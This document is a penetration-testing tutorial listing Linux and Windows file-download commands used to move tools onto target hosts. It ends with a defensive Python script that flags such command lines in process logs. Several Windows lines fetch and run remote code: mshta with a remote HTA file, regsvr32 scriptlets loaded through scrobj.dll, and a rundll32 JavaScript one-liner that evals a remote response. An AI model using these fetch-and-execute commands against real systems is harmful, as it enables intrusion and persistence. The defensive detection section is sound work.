File Transfer Techniques for Penetration Testing: Linux and Windows Download Commands

This article compiles common file download commands and tools used in penetration testing for both Linux and Windows environments, covering utilities such as wget, curl, axel, aria2, PowerShell, certutil, bitsadmin, and others, with example syntax for direct, background, and resumable transfers.

Python Programming Learning Circle

During penetration testing, files often need to be transferred to a target host for privilege escalation or to maintain control. When direct transfer is not possible but the host has network connectivity, the files can instead be downloaded from the internet.

Linux download utilities

Wget

Wget supports resume, multiple files, bandwidth control, etc.

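# Plain download into the current directory
wget http://www.sample-videos.com/video/mp4/big.mp4
# -b: run in the background
wget -b http://www.sample-videos.com/video/mp4/big.mp4
# -c: resume a partially downloaded file
wget -c http://www.sample-videos.com/video/mp4/big.mp4
# Download from an FTP server that requires credentials
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address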

Curl

Curl is a versatile downloader that can upload or download files, resume downloads, and supports many protocols.

curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4

Axel

Axel is a lightweight accelerator that opens multiple HTTP connections to download file fragments in parallel.

apt-get install axel
axel http://www.sample-videos.com/video/mp4/big.mp4

Aria2

Aria2 is an open‑source command‑line download accelerator supporting multiple connections and maximum bandwidth usage.

apt-get install aria2
aria2c http://www.sample-videos.com/video/mp4/big.mp4

Perl

Perl can download files using LWP::Simple.

#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");

Python

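Python can download a file with urllib2 (Python 2) or its Python 3 replacement, urllib.request.

#!/usr/bin/env python3
# urllib2 exists only in Python 2; urllib.request is the Python 3 equivalent.
from urllib.request import urlopen

u = urlopen('http://domain/file')
# Binary mode writes the response byte for byte, so non-text files are not corrupted.
with open('local_file', 'wb') as localFile:
    localFile.write(u.read())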

Ruby

Ruby can download a file using Net::HTTP.

#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file| file.write(r.body) }
}

PHP

PHP can download a file with file() and fwrite.

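#!/usr/bin/php
<?php
// file() returns the response as an array of lines, or false on failure.
$data = @file("http://example.com/file");
if ($data === false) {
    exit(1);
}
$lf = "local_file";
$fh = fopen($lf, 'wb');
// Join every line; writing only $data[0] would save just the first line.
fwrite($fh, implode('', $data));
fclose($fh);
?>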

FTP (bash script)

A non‑interactive FTP script can download a file.

# -n disables auto-login so the script can supply the credentials itself
ftp -n 127.0.0.1 <<EOF
user username password
binary
get file
bye
EOF

Netcat

Netcat can be used to transfer a file over a listening port.

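# Sender: listen on port 1234 and serve the file (traditional netcat needs -l -p 1234)
cat file | nc -l 1234
# Receiver: connect to the sender and write the stream to disk
nc host_ip 1234 > file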

Windows download techniques

PowerShell

PowerShell can download a file using System.Net.WebClient.

$p = New-Object System.Net.WebClient
# PowerShell does not expand cmd-style %homepath%; use $env:USERPROFILE instead
$p.DownloadFile("http://domain/file", "$env:USERPROFILE\file")

IPC$ share

copy \\192.168.3.1\c$\test.exe E:\file
cmd.exe /k < \\webdavserver\folder\batchfile.txt

Certutil

Certutil can download a file through its URL cache; the second command below deletes the cached entry for that URL afterwards.

certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe
certutil -urlcache -split -f http://192.168.3.1/test.exe delete

Visual Basic (VBScript)

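Set args = Wscript.Arguments
Url = "http://domain/file"
' VBScript does not expand %VAR% inside string literals, so resolve the path explicitly
dim sh: Set sh = createobject("WScript.Shell")
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 ' binary stream
    .open
    .write xHttp.responseBody
    .savetofile sh.ExpandEnvironmentStrings("%USERPROFILE%\file"), 2 ' 2 = overwrite
end with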

Tftp

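rem Upload: the source is the local file, the destination is the remote path
tftp -i IP_ADDRESS PUT C:\%homepath%\file remote_path
rem Download: the source is the remote path, the destination is the local file
tftp -i IP_ADDRESS GET remote_path C:\%homepath%\file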

Bitsadmin

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\phpstudy_pro\WWW\b.ps1"
bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt

Mshta

Mshta can execute a remote HTA file.

mshta http://192.168.3.1/run.hta

Rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);

Regsvr32

regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll

Windows Share

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

Format conversion (Nishang)

PS > .\ExetoText.ps1 evil.exe evil.txt
PS > .\TexttoExe.ps1 evil.txt evil.exe

Other utilities

Examples include msxsl.exe, pubprn.vbs, esentutl.exe, extrac32.exe, desktopimgdownldr.exe, etc., which can be abused to download files.
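
From the defender's side, each Windows technique above leaves a recognisable process command line (for example in Sysmon Event ID 1 or Security 4688 records). The following is an added example, not code from the original article: the rule names, patterns and sample events are assumptions constructed for illustration, with the positive samples taken from the commands listed on this page.

```python
import re

# Each rule needs the binary name AND the argument shape that turns it into a
# network fetch, so routine administrative use of the same binary is ignored.
# Rule names and patterns are hypothetical, written for this illustration.
RULES = {
    "certutil-urlcache": r'\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://',
    "bitsadmin-transfer": r'\bbitsadmin(\.exe)?\b.*/transfer\b.*\bhttps?://',
    "mshta-remote-hta": r'\bmshta(\.exe)?\b\s+"?https?://',
    "regsvr32-remote-scriptlet": r'\bregsvr32(\.exe)?\b.*/i:https?://.*\bscrobj\.dll\b',
    "rundll32-javascript": r'\brundll32(\.exe)?\b\s+javascript:',
    "powershell-webclient": r'net\.webclient\b.*\.downloadfile\(',
    "tftp-binary-get": r'\btftp(\.exe)?\b.*\s-i\s.*\bget\b',
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}


def classify(command_line):
    """Return the sorted names of every rule the command line matches."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(command_line))


def triage(events):
    """events: iterable of (host, command_line). Return (host, rules, command_line) per hit."""
    hits = []
    for host, cmd in events:
        rules = classify(cmd)
        if rules:
            hits.append((host, rules, cmd))
    return hits


# Constructed process-creation events: download-style invocations from this
# article next to benign uses of the same binaries that must not be flagged.
SAMPLE_EVENTS = [
    ("ws01", r"certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe"),
    ("ws01", r"certutil -hashfile C:\Temp\setup.exe SHA256"),
    ("ws02", r'bitsadmin /transfer myDownLoadJob /download /priority normal '
             r'"http://192.168.203.140/b.ps1" "E:\phpstudy_pro\WWW\b.ps1"'),
    ("ws02", r"bitsadmin /list /allusers"),
    ("ws03", r"regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll"),
    ("ws03", r"regsvr32 /s C:\Windows\System32\msxml6.dll"),
    ("ws04", r"mshta http://192.168.3.1/run.hta"),
]

if __name__ == "__main__":
    for host, rules, cmd in triage(SAMPLE_EVENTS):
        print(host, ",".join(rules), cmd)
```

Hits are triage leads: correlate them with the parent process and the outbound connection before acting.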

Original source: https://www.cnblogs.com/-mo-/p/12109717.html
